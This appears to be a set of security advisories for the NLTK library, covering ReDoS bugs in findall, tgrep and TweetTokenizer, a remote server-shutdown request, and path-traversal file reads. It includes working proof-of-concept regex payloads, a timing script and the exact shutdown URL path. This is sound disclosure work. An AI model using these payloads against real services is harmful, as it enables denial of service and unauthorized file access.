Hello,
We are reporting a high-severity vulnerability in NLTK, a leading Python natural language processing library (14,000+ GitHub stars) with over a billion downloads.
CVE: CVE-2026-80205 CVSS: 8.7 (High, CVSSv4) / 7.5 (High, CVSSv3.1) GHSA: https://github.com/nltk/nltk/security/advisories/GHSA-rrv8-h7p8-rx55 <https://github.com/nltk/nltk/security/advisories/GHSA-rrv8-h7p8-rx55>
Affected: nltk <= 3.9.4 Fixed: 3.10.0 (commit d8e4753)
Summary:
The Text.findall() and TokenSearcher.findall() methods accept user-supplied regex patterns and pass them to Python's re engine without timeout protection or backtracking complexity validation, enabling a Regular Expression Denial of Service (ReDoS) attack.
The root cause is that user input undergoes syntactic transformation (angle-bracket to standard regex conversion), but this preprocessing is purely structural and does not constrain catastrophic backtracking potential. The transformed pattern reaches re.findall() unprotected, allowing nested quantifiers to force exponential state enumeration — pinning the CPU and hanging the process indefinitely.
Proof of concept:
from nltk.text import Text text = Text(["aaaaaaaaaaaaaaaaaaaaaaaa!"]) text.findall(r"<((a+)+)b>") # CPU @ 100%, indefinite hang
Fix:
Upgrade to nltk 3.10.0+:
pip install "nltk>=3.10.0"
The fix replaces stdlib re with the regex library, which supports timeout parameters. Both vulnerable methods now accept an explicit timeout argument with a system-wide default from nltk.redos.DEFAULTTIMEOUT, raising TimeoutError instead of allowing indefinite saturation. Full writeup: https://www.offgridsec.com/blog-nltk-redos.html
Reported by: Offgrid Security (https://offgridsec.com)
Found by: Kira, model-agnostic autonomous AI security agent
Summary The NLTK tgrep module accepts user-supplied regular expressions and passes them to the Python re engine without a timeout or validation, enabling catastrophic backtracking (ReDoS). Applications that expose the tgrep API to external input are vulnerable to a single-request denial of service that blocks the Python process indefinitely.
Affected Code nltk/tgrep.py — tgrepnodeaction() (around line 320)
When a tgrep pattern contains a /regex/ node, tgrepnodeaction compiles the embedded regex literal directly with no validation:
python def tgrepnodeaction(s, l, tokens): ... elif tokens[0].startswith("/"): assert tokens[0].endswith("/") nodelit = tokens[0][1:-1] return ( lambda r: lambda n, m=None, l=None: r.search( tgrepnodeliteralvalue(n) ) )(re.compile(nodelit)) # User regex compiled and executed with no timeout The compiled regex is applied against every matching tree node label via r.search(...). A caller reaching this path via tgreppositions() or tgrepcompile() controls nodelit entirely.
Proof of Concept python import nltk from nltk.tgrep import tgreppositions
Root node label is 25 'a' characters. tgrep /regex/ branch calls re.compile("((a+)+)b").search("aaa...a") No 'b' is present — exponential backtracking occurs. tree = nltk.Tree.fromstring("(" + "a" 25 + " (NP (DT the)))") tgreppositions(r"/((a+)+)b/", [tree]) # Never returns
Working Poc
The following script uses increasing values of n (the number of repeated as in the tree root label) to measure the execution time of tgreppositions with the catastrophic regex /((a+)+)b/. On standard CPython with NLTK 3.10.2, the runtime grows exponentially, confirming the ReDoS vulnerability. For n ≥ 35, the function will hang indefinitely.
python import nltk from nltk.tgrep import tgreppositions import time
def testn(n): tree = nltk.Tree.fromstring("(" + "a" n + " (NP (DT the)))") pattern = r"/((a+)+)b/" start = time.perfcounter() list(tgreppositions(pattern, [tree])) return time.perfcounter() - start
if name == "main": # Adjust the range if needed – these values complete quickly nvalues = [18, 20, 22, 24, 26, 28] print(f"Testing n = {nvalues}\n")
times = [] for n in nvalues: t = testn(n) times.append((n, t)) print(f"n={n:2d} done", flush=True)
print("\n--- Increase factors (per step in n) ---") factors = [] for i in range(1, len(times)): prevn, prevt = times[i-1] currn, currt = times[i] factor = currt / prevt factors.append((currn, factor)) print(f"n={currn:2d} : factor = {factor:.2f}x (vs n={prevn})")
avg = sum(f for , f in factors) / len(factors) print(f"\nAverage factor: {avg:.2f}x") print("\n✅ Confirmed: exponential growth (catastrophic backtracking).") print(" Larger n (≥ 35) will hang indefinitely.")
When run, the output shows a clear exponential increase (factor > 3.0 per +2 in n), proving the vulnerability.
Impact In environments like web APIs (Flask, FastAPI), Jupyter notebooks, or multi-tenant pipelines, an unauthenticated attacker can cause indefinite CPU saturation with a single crafted request, denying service to all other users of the process.
Remediation This issue remains unfixed in versions <= 3.10.2. Maintainers are currently collaborating on a patch to wrap the regex execution in a timeout-guarded mechanism.
Credit Tool: Kira by Offgrid Security
Summary NLTK's Text.findall() and TokenSearcher.findall() methods accept user-supplied regular expressions and pass them to the Python re engine without timeout or validation, enabling catastrophic backtracking (ReDoS). This issue is isolated to the nltk.text module and was resolved in a prior commit.
Affected Code nltk/text.py — TokenSearcher.findall() (line 255) / Text.findall() (line 620)
TokenSearcher.init builds an internal string by wrapping each token in angle brackets. The findall() method preprocesses the caller-supplied regexp and runs it directly against this string with no timeout:
python def findall(self, regexp): # Preprocessing does NOT prevent catastrophic backtracking regexp = re.sub(r"\s", "", regexp) regexp = re.sub(r"<", "(?:<(?:", regexp) regexp = re.sub(r">", ")>)", regexp) regexp = re.sub(r"(?<!\\)\.", "[^>]", regexp)
# User-controlled regexp executed with no timeout hits = re.findall(regexp, self.raw) The preprocessing transforms < and > angle-bracket syntax but does not inspect or reject catastrophically backtracking patterns.
Proof of Concept python import nltk import time
Token of 25 'a' characters produces self.raw = "<aaaaaaaaaaaaaaaaaaaaaaaa!>" The trailing '!' ensures no match, forcing full backtracking. text = nltk.Text(["a" 25 + "!"])
Pattern after transformation: < → (?:<(?: → )>) Becomes: (?:<(?:((a+)+)b)>) re.findall runs this against "<aaaaaaaaaaaaaaaaaaaaaaaa!>" — hangs.
start = time.time() text.findall(r"<((a+)+)b>") # Never returns
Impact Applications that expose Text.findall() to external input are vulnerable to a denial of service. An unauthenticated attacker can cause indefinite CPU saturation with one request, denying service to all other users of the Python process.
Remediation This vulnerability was patched in commit d8e4753. Users should update to the patched version.
Credit Tool: Kira by Offgrid Security
The URLS regular expression in nltk/tokenize/casual.py, compiled into TweetTokenizer.WORDRE and applied by TweetTokenizer.tokenize, contains a naked-domain branch whose domain-label prefix [a-z0-9]+(?:[.\-][a-z0-9]+) is unbounded. Input consisting of many alternating label separators can be partitioned in exponentially many ways, and because the branch also requires a trailing top-level domain that such input never supplies, the engine explores those partitions before failing at each offset. A few kilobytes of input therefore consumes seconds to minutes of single-threaded CPU, and the HANGRE substitution performed before matching does not collapse the pattern. TweetTokenizer is intended for tokenizing untrusted social-media text, so any service that applies it, or the module-level casualtokenize, to submitted text can be stalled per request without authentication. Version 3.10.1 bounds the label repetition.
A vulnerability in nltk.app.wordnetapp up to version 3.9.3 allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when started in its default mode. The server listens on all interfaces and processes a specific unauthenticated GET request (/SHUTDOWN%20THE%20SERVER) to terminate the process immediately via os.exit(0). This results in a denial of service, impacting service availability. The issue arises due to insufficient authentication and protection mechanisms for critical server functions.
A vulnerability in the filestring() function of the nltk.util module in nltk version 3.9.2 allows arbitrary file read due to improper validation of input paths. The function directly opens files specified by user input without sanitization, enabling attackers to access sensitive system files by providing absolute paths or traversal paths. This vulnerability can be exploited locally or remotely, particularly in scenarios where the function is used in web APIs or other interfaces that accept user-supplied input.
Last updated 6 May 2026
A vulnerability in NLTK versions up to and including 3.9.2 allows arbitrary file read via path traversal in multiple CorpusReader classes, including WordListCorpusReader, TaggedCorpusReader, and BracketParseCorpusReader. These classes fail to properly sanitize or validate file paths, enabling attackers to traverse directories and access sensitive files on the server. This issue is particularly critical in scenarios where user-controlled file inputs are processed, such as in machine learning APIs, chatbots, or NLP pipelines. Exploitation of this vulnerability can lead to unauthorized access to sensitive files, including system files, SSH private keys, and API tokens, and may potentially escalate to remote code execution when combined with other vulnerabilities.
A vulnerability in NLTK versions up to and including 3.9.2 allows arbitrary file read via path traversal in multiple CorpusReader classes, including WordListCorpusReader, TaggedCorpusReader, and BracketParseCorpusReader. These classes fail to properly sanitize or validate file paths, enabling attackers to traverse directories and access sensitive files on the server. This issue is particularly critical in scenarios where user-controlled file inputs are processed, such as in machine learning APIs, chatbots, or NLP pipelines. Exploitation of this vulnerability can lead to unauthorized access to sensitive files, including system files, SSH private keys, and API tokens, and may potentially escalate to remote code execution when combined with other vulnerabilities.